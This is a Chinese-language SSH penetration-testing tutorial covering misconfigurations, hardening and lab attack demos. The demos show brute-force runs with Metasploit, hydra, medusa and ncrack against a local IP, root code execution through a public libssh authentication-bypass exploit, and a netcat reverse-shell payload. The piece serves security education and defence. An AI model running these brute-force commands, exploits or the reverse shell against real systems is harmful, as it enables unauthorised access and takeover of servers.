SSH服务渗透测试利用指北
导语:最著名和最常见的SSH服务器和客户端是openSSH(*OpenBSD安全shell*)。它是一个功能强大的实现,维护良好,于1999年首次发布。
0x01 SSH和SFTP是什么
SSH是一种安全的远程shell协议,用于通过不安全的网络安全地运行网络服务。默认的SSH端口是22,通常会在Internet或Intranet上的服务器上看到它的打开状态。
SFTP是SSH文件传输协议,该协议用于通过SSH连接传输文件,大多数SSH实现也支持SFTP。
0x02 SSH服务器/库
最著名和最常见的SSH服务器和客户端是openSSH(OpenBSD安全shell)。它是一个功能强大的实现,维护良好,于1999年首次发布。因此,这是自Windows 10以来在Windows中附带的BSD,Linux的软件中Windows上最常看到的实现。
但是openSSH并不是唯一的实现,这里还有其他软件实现:
SSH服务器:
· openSSH – OpenBSD SSH,自Windows 10起在BSD,Linux发行版和Windows中提供
· Dropbear – OpenWrt附带的用于内存和处理器资源较少的环境的SSH实现
· PuTTY – Windows的SSH实现,通常使用客户端,很少使用服务器
· CopSSH – Windows版OpenSSH的实现
SSH库(在服务器端实现):
· libssh -多平台C库实现与在绑定SSHv2的协议的Python,Perl的和ropensci ; 它由KDE用于sftp,由GitHub用于git SSH基础结构
· wolfSSH –用ANSI C编写的SSHv2服务器库,面向嵌入式,RTOS和资源受限的环境
· Apache MINA SSHD – Apache SSHD Java库基于Apache MINA
· paramiko – Python SSHv2协议库
0x03 常见配置错误
root账号登录
默认情况下,大多数SSH服务器实现将允许root登录,建议禁用它,因为如果该帐户的凭据泄漏,攻击者将直接获得管理特权,这也将允许攻击者对该帐户进行暴力攻击。
如何禁用openSSH的root登录:
1. 编辑SSH服务器配置 sudoedit /etc/ssh/sshd_config
2. 更改#PermitRootLogin yes成PermitRootLogin no
3. 进行配置更改: sudo systemctl daemon-reload
4. 重启SSH服务器 sudo systemctl restart sshd
SFTP命令执行
另一个常见的SSH错误配置通常出现在SFTP配置中。在大多数情况下,创建SFTP服务器时,管理员希望用户具有SFTP访问权限来共享文件,而不希望在计算机上获得远程Shell。因此,他们认为创建用户,为用户分配占位符shell(如/usr/bin/nologin或/usr/bin/false)并将其chroot足以避免shell访问或滥用整个文件系统。但这是错误的,用户可以在身份验证后立即要求执行命令,然后再执行其默认命令或shell程序。因此,要绕过将拒绝shell访问的占位符shell,只需执行以下操作即可要求执行一条命令(例如/bin/bash):
$ ssh -v noraj@192.168.1.94 id ... Password: debug1: Authentication succeeded (keyboard-interactive). Authenticated to 192.168.1.94 ([192.168.1.94]:22). debug1: channel 0: new [client-session] debug1: Requesting no-more-sessions@openssh.com debug1: Entering interactive session. debug1: pledge: network debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0 debug1: Sending command: id debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0 uid=1000(noraj) gid=100(users) groups=100(users) debug1: channel 0: free: client-session, nchannels 1 Transferred: sent 2412, received 2480 bytes, in 0.1 seconds Bytes per second: sent 43133.4, received 44349.5 debug1: Exit status 0 $ ssh noraj@192.168.1.94 /bin/bash
这是用户的安全SFTP配置(/etc/ssh/sshd_config– openSSH)的noraj示例:
Match User noraj ChrootDirectory %h ForceCommand internal-sftp AllowTcpForwarding no PermitTunnel no X11Forwarding no PermitTTY no
此配置将仅允许SFTP:通过强制启动命令并禁用TTY访问来禁用shell程序访问,还可以禁用所有类型的端口转发或隧道。
认证方式
在高安全性环境中,通常的做法是仅启用基于密钥或两因素的身份验证,而不是基于简单因素密码的身份验证。但是通常启用更强的身份验证方法而不会禁用较弱的身份验证方法。一种常见的情况是启用publickeyopenSSH配置并将其设置为默认方法,而不是禁用password。因此,通过使用SSH客户端的详细模式,攻击者可以启用了一种较弱登录的方法:
$ ssh -v 192.168.1.94 OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019 ... debug1: Authentications that can continue: publickey,password,keyboard-interactive
例如,如果设置了身份验证失败限制,而你再也没有机会使用密码方法,则可以使用该PreferredAuthentications选项强制使用此方法。
$ ssh -v 192.168.1.94 -o PreferredAuthentications=password ... debug1: Next authentication method: password
查看SSH服务器配置是否必要,以检查是否仅授权了预期的方法。在客户端上使用详细模式可以帮助查看配置的有效性。
0x04 攻击演示
现在,我们将看到一组攻击示例,你可以在某些SSH服务器实现中复制这些攻击示例。
密码爆破
现在,我将使用四个工具,通过metasploit框架,hydra,medusa和ncrack,对带有密码字典的SSH用户密码进行暴力破解。
在所有情况下,我们将机器锁定192.168.1.94在端口22上,并且仅暴力破解用户noraj的密码。
如果你不了解参数/选项,请阅读下面给出的帮助消息。
Metasploit
使用Metasploit:
$ msf5 > search ssh Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- ... 17 auxiliary/scanner/ssh/ssh_login normal Yes SSH Login Check Scanner ... msf5 > use 17 msf5 auxiliary(scanner/ssh/ssh_login) > show options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/password/rockyou.txt PASS_FILE => /usr/share/wordlists/password/rockyou.txt msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.94 RHOSTS => 192.168.1.94 msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 10 THREADS => 10 msf5 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf5 auxiliary(scanner/ssh/ssh_login) > set username noraj username => noraj msf5 auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.1.94:22 - Success: 'noraj:noraj' '' [*] Command shell session 1 opened (192.168.1.83:37291 -> 192.168.1.94:22) at 2020-01-02 21:33:33 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
hydra
下载地址:https://github.com/vanhauser-thc/thc-hydra
$ hydra -l noraj -P /usr/share/wordlists/password/rockyou.txt -e s ssh://192.168.1.94 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-02 21:44:28 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.1.94:22/ [22][ssh] host: 192.168.1.94 login: noraj password: noraj 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-02 21:44:33
帮助消息的摘录:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -e nsr try "n" null password, "s" login as pass and/or "r" reversed login service the service to crack (see below for supported protocols)
medusa
下载地址:http://foofus.net/goons/jmk/medusa/medusa.html
$ medusa -h 192.168.1.94 -u noraj -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks ACCOUNT CHECK: [ssh] Host: 192.168.1.94 (1 of 1, 0 complete) User: noraj (1 of 1, 0 complete) Password: noraj (1 of 14344391 complete) ACCOUNT FOUND: [ssh] Host: 192.168.1.94 User: noraj Password: noraj [SUCCESS]
帮助消息的摘录:
-h [TEXT] : Target hostname or IP address -u [TEXT] : Username to test -P [FILE] : File containing passwords to test -e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username) -M [TEXT] : Name of the module to execute (without the .mod extension)
ncrack
下载地址:https://github.com/nmap/ncrack
$ ncrack --user noraj -P /usr/share/wordlists/password/rockyou.txt ssh://192.168.1.94 Starting Ncrack 0.7 ( http://ncrack.org ) at 2020-01-02 21:50 CET Discovered credentials for ssh on 192.168.1.94 22/tcp: 192.168.1.94 22/tcp ssh: 'noraj' 'noraj' Ncrack done: 1 service scanned in 3.00 seconds. Ncrack finished.
帮助消息的摘录:
-P : password file --user : comma-separated username list
漏洞利用– LibSSH RCE
CVE-2018-10933是libssh库的漏洞的一个示例,此漏洞通过绕过身份验证允许未经授权的访问。
libssh 0.6及更高版本在服务器代码中具有身份验证绕过漏洞。通过向服务器提供SSH2_MSG_USERAUTH_SUCCESS消息代替服务器希望进行身份验证的SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。
https://www.libssh.org/security/advisories/CVE-2018-10933.txt
当你找到易受攻击的版本时,nmap应该看到类似以下内容:
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
searchsploit(用于本地浏览Exploit-DB的工具)显示了可用于libssh的现有漏洞利用。
searchsploit libssh -------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------- ---------------------------------------- LibSSH 0.7.6 / 0.8.4 - Unauthorized Access | exploits/linux/remote/46307.py libSSH - Authentication Bypass | exploits/linux/remote/45638.py -------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result
因此,我们可以使用漏洞利用程序在目标上执行命令,以确认其是否正常运行。
$ python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 id uid=0(root) gid=0(root) groups=0(root)
我们可以尝试执行反向Shell,而不仅仅是运行命令。
首先,我们在机器上启动监听器:sudo ncat -nlp 80。
然后,在漏洞利用中使用sh反向shell paylaod:
python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 80 >/tmp/f"
模糊测试
由于模糊测试很复杂,因此我只重点介绍两种方法:
· 通用和自动化方法。
· 自定义和手动方法。
通用和自动化方法
可以使用sshfuzz.pl之类的脚本来自动对实时SSH服务器进行模糊测试,无论其实现如何。
它具有简单的优点,但是它的针对性不强,因此将花费大量时间并且错过很多结果。
安装依赖并启动脚本就像编写这两行一样简单:
$ cpan Net::SSH2 $ ./sshfuzz.pl -H 192.168.1.94 -P 22 -u noraj -p noraj
另一种适用于任何实时SSH服务器的自动化方法是使用metasploit模块auxiliary/fuzzers/ssh/ssh_version_2:
msf5 > use auxiliary/fuzzers/ssh/ssh_version_2 msf5 auxiliary(fuzzers/ssh/ssh_version_2) > set RHOSTS 192.168.1.94 msf5 auxiliary(fuzzers/ssh/ssh_version_2) > run [*] Running module against 192.168.1.94 [*] 192.168.1.94:22 - Fuzzing with iteration 100 using fuzzer_string_giant [*] 192.168.1.94:22 - Fuzzing with iteration 200 using fuzzer_string_giant [*] 192.168.1.94:22 - Fuzzing with iteration 300 using fuzzer_string_long [*] 192.168.1.94:22 - Fuzzing with iteration 400 using fuzzer_string_long [*] 192.168.1.94:22 - Fuzzing with iteration 500 using fuzzer_string_paths_giant [*] 192.168.1.94:22 - Fuzzing with iteration 600 using fuzzer_string_paths_giant [*] 192.168.1.94:22 - Fuzzing with iteration 700 using fuzzer_string_paths_giant [*] 192.168.1.94:22 - Fuzzing with iteration 800 using fuzzer_string_paths_giant [*] 192.168.1.94:22 - Fuzzing with iteration 900 using fuzzer_string_paths_giant [*] 192.168.1.94:22 - Fuzzing with iteration 1000 using fuzzer_string_paths_giant ...
使用这些工具很容易,但是找到可利用的东西的机会很小。
自定义和手动方法
如果你想找到更重要的结果并有时间熟悉目标实现,可以选择手动方法。
这里的技术是在自运行的SSH服务器上使用高级通用fuzzer,并修改源代码以优化测试执行时间。因此,它将需要配置模fuzzer,配置和构建目标实现,检测崩溃,减少使用资源密集型功能以加快fuzzing,增加覆盖范围,创建输入测试用例和输入字典,必须深刻的理解SSH协议及其实现。
这是Vegard Nossum 使用AFL对OpenSSH守护进程进行Fuzzing的示例。
http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html
0x05 相关工具资源
“ HASSH ”是一种网络指纹识别标准,可用于标识特定的客户端和服务器SSH实现。指纹可以以MD5指纹的形式轻松存储,搜索和共享。
HASSH是一项标准,可帮助团队检测,控制和调查暴力或凭据填充密码尝试,数据泄露,网络发现和横向移动等。
ssh-audit是SSH服务器代码审计工具(密钥交换,加密,mac,压缩信息,兼容性,安全性等)。
对于专业的渗透测试人员来说,快速检测目标版本并了解远程服务器上可用的算法以向客户提供算法建议非常方便。
使用示例:
$ ssh-audit 192.168.1.94 # general (gen) banner: SSH-2.0-OpenSSH_7.9 (gen) software: OpenSSH 7.9 (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+ (gen) compression: enabled (zlib@openssh.com) # key exchange algorithms (kex) curve25519-sha256 -- [warn] unknown algorithm (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak) `- [info] available since OpenSSH 4.4 (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3 (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53 # host-key algorithms (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2 (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2 (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28 (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves `- [warn] using weak random number generator could reveal the key `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (key) ssh-ed25519 -- [info] available since OpenSSH 6.5 # encryption algorithms (ciphers) (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5 `- [info] default cipher since OpenSSH 6.9. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes192-ctr -- [info] available since OpenSSH 3.7 (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2 (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2 # message authentication code algorithms (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size `- [info] available since OpenSSH 6.2 (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 6.2 (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode `- [warn] using small 64-bit tag size `- [info] available since OpenSSH 4.7 (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28 # algorithm recommendations (for OpenSSH 7.9) (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove (rec) -hmac-sha2-512 -- mac algorithm to remove (rec) -umac-128@openssh.com -- mac algorithm to remove (rec) -hmac-sha2-256 -- mac algorithm to remove (rec) -umac-64@openssh.com -- mac algorithm to remove (rec) -hmac-sha1 -- mac algorithm to remove (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
尽管对于SSH特定的漏洞利用开发并没有多少实际存在,但许多相同的一般趋势也适用。许多书籍和文章详细介绍了0-day漏洞基于栈和基于堆的漏洞利用的开发,其中一些在资源页面的相应部分中进行了介绍。
[Corelan](https://www.corelan.be/) https://community.turgensec.com/cyber-security-books/#Exploit_Development_Books Shellcoders黑客手册:https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/ref=as_li_ss_tl?&hvadid=310913487979&hvpos=1o1&hvnetw=g&hvrand=8783653603300561519&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=9045957&hvtargid=pla-490871754939&psc=1&th=1&psc=1&linkCode=ll1&tag=turgen-20&linkId=07fb8b8c94849821380f9f4e955ec549&language=en_US
下面列出了一些近期最著名的远程SSH漏洞:
· https://www.exploit-db.com/exploits/18557〜Sysax 5.53 – SSH“用户名”远程缓冲区溢出漏洞
· https://www.exploit-db.com/exploits/45001〜OpenSSH <6.6 SFTP –命令执行漏洞
· https://www.exploit-db.com/exploits/45233〜OpenSSH 2.3<7.7 –用户名枚举漏洞
· https://www.exploit-db.com/exploits/46516〜OpenSSH SCP客户端–写入任意文件漏洞
0x06 SSH安全准则
Mozilla在本参考指南中提出了一些建议,以帮助保护OpenSSH服务器的安全。
https://infosec.mozilla.org/guidelines/openssh https://bettercrypto.org/#ssh https://github.com/BetterCrypto/Applied-Crypto-Hardening
有关安全SSH配置的最新最佳实践,也在Applied Crypto Hardening的指南中给出,当前为OpenSSH,Cisco ASA和Cisco IOS提供了配置示例。
发表评论
提供云计算服务